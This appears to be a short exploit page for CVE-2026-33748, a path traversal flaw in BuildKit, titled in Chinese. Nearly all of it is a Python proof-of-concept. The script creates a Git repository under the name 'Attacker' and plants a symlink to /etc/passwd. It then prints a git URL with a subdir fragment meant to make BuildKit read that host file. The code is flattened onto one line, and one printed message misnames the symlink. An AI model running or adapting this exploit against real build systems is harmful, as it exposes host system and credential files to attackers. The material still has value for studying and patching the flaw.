CVE-2026-33748 BuildKit 路径遍历漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-33748 (BuildKit Path Traversal) Demonstrates the creation of a malicious Git repository to exploit the subdir validation issue. """ import os import subprocess def create_exploit_repo(): repo_name = "malicious_git_repo" if os.path.exists(repo_name): os.system(f"rm -rf {repo_name}") os.makedirs(repo_name) os.chdir(repo_name) # Initialize git repo subprocess.run(["git", "init"]) subprocess.run(["git", "config", "user.email", "[email protected]"]) subprocess.run(["git", "config", "user.name", "Attacker"]) # Create a safe directory and place a symlink inside it os.makedirs("subdir_component", exist_ok=True) # Create a symlink pointing to a sensitive file outside the repo (e.g. /etc/passwd) target_path = "/etc/passwd" try: os.symlink(target_path, "subdir_component/secret_file") print(f"[+] Created symlink: subdir_component/secret_link -> {target_path}") except OSError as e: print(f"[-] Error creating symlink: {e}") return # Commit the structure subprocess.run(["git", "add", "."]) subprocess.run(["git", "commit", "-m", "PoC for CVE-2026-33748"]) print(f"[+] Exploit repository created in './{repo_name}'") print("[+] To trigger the vulnerability in BuildKit, use a URL like:") print(f" git://github.com/attacker/{repo_name}.git#subdir=subdir_component/secret_file") if __name__ == "__main__": create_exploit_repo()